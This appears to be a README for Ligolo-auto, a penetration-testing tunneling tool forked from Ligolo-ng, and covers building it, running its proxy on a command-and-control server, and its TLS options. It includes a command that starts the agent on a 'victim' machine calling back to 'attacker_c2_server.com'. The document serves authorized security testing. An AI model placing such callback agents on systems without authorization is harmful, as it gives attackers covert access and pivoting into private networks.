# Ligolo-auto : Tunneling like a VPN in an automatic way

![Ligolo Logo](doc/ligolo-auto2.jpg)

An advanced, automatic, easy, tunneling tool that uses TUN interfaces.

[![GPLv3](https://img.shields.io/badge/License-GPLv3-brightgreen.svg)](https://www.gnu.org/licenses/gpl-3.0)

## Introduction

**Ligolo-auto** is a *automatic*, *simple*, *lightweight* and *fast* tool that allows pentesters to establish
tunnels from a reverse TCP/TLS connection using a **tun interface** (without the need of SOCKS).

![Ligolo walkthrough](https://gitlab.com/antonio50/ligolo-auto/-/raw/main/doc/Ligolo-auto.gif)


## Features

- No more overhelming with routes. Everything is automatic!
- **Tun interface** (No more SOCKS!)
- Simple UI with *agent* selection and *network information*
- Easy to use and setup
- Automatic certificate configuration with Let's Encrypt
- Performant (Multiplexing)
- Does not require high privileges
- Socket listening/binding on the *agent*
- Multiple platforms supported for the *agent*
- Can handle multiple tunnels
- Reverse/Bind Connection

## How is this different from Ligolo-ng/Ligolo/Chisel/Meterpreter... ?

Ligolo-auto is an advanced fork of Ligolo-ng, specifically designed to eliminate the inefficiencies associated with manual configuration. This enhanced version automates every step of the process, including the setup of listeners, routes, and tunnels, thereby significantly reducing the time and effort required for these tasks. With Ligolo-auto, users benefit from a seamless and efficient workflow where all necessary configurations are handled automatically. However, for those who prefer or require manual control, the flexibility to intervene and configure settings manually is still available. This makes Ligolo-auto a versatile and powerful tool, ideal for automating penetration testing procedures, ensuring consistency, and improving the overall efficiency and effectiveness of security assessments. Whether for routine penetration tests or more complex scenarios, Ligolo-auto provides a reliable and robust solution to meet the diverse needs of security professionals.

## Building & Usage

### Building Ligolo-auto
Building *ligolo-auto* (Go >= 1.20 is required):

```shell
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
```

### Setup Ligolo-auto

#### Running Ligolo-auto proxy server

Start the *proxy* server on your Command and Control (C2) server (default port 11601):

```shell
$ ./proxy -h # Help options
$ ./proxy -auto # Enable automatic mode. for each agent registred, routers and listerners will be configured.   2 listers will be loaded, 1 http server as dealer for agent and other to link the proxy
$ ./proxy -dealer # change port for dealer. Default is 8880
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
$ ./proxy -selfcert # Use self-signed certificates
```

### TLS Options

#### Using Let's Encrypt Autocert

When using the `-autocert` option, the proxy will automatically request a certificate (using Let's Encrypt) for *attacker_c2_server.com* when an agent connects.

> Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

#### Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the `-certfile` and `-keyfile` parameters.

#### Automatic self-signed certificates

The *proxy/relay* can automatically generate self-signed TLS certificates using the `-selfcert` option.

***Validating self-signed certificates fingerprints (recommended)***

When running selfcert, you can run the `certificate_fingerprint` command to print the currently used certificate fingerprint.

```
ligolo-auto » certificate_fingerprint 
INFO[0203] TLS Certificate fingerprint for ligolo is: D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC 
```

On the agent, you can then connect using the fingerprint provided by the Ligolo-auto proxy.

```
ligolo-agent -connect 127.0.0.1:11601 -v -accept-fingerprint D005527D2683A8F2DB73022FBF23188E064493CFA17D6FCF257E14F4B692E0FC                                               nchatelain@nworkstation
INFO[0000] Connection established                        addr="127.0.0.1:11601"
```

> By default, the "ligolo" domain name is used for TLS Certificate generation. You can change the domain by using the -selfcert-domain [domain] option at startup.

***Ignoring all certificate verification (for lab/debugging)***

To ignore all security mechanisms, the `-ignore-cert` option can be used with the *agent*.

> Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
### Using Ligolo-auto

#### Start the agent

Start the *agent* on your target (victim) computer (no privileges are required!):

```shell
$ ./agent -connect attacker_c2_server.com:11601
```

#### Setup routing



## Performance

You can easily hit more than 100 Mbits/sec. Here is a test using `iperf` from a 200Mbits/s server to a 200Mbits/s connection.
```shell
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes       
[  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes       
[  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes       
[  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes       
[  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes       
[  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes       
[  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes       
[  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes       
[  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes       
[  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender
[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver
```

## Caveats

Because the *agent* is running without privileges, it's not possible to forward raw packets.
When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using *nmap*, you should use `--unprivileged` or `-PE` to avoid false positives.

## Todo

- Implement other ICMP error messages (this will speed up UDP scans) ;
- Do not *RST* when receiving an *ACK* from an invalid TCP connection (nmap will report the host as up) ;
- Add mTLS support.

## Credits

- Antonio Horta <antonio -at- horta.net.br>
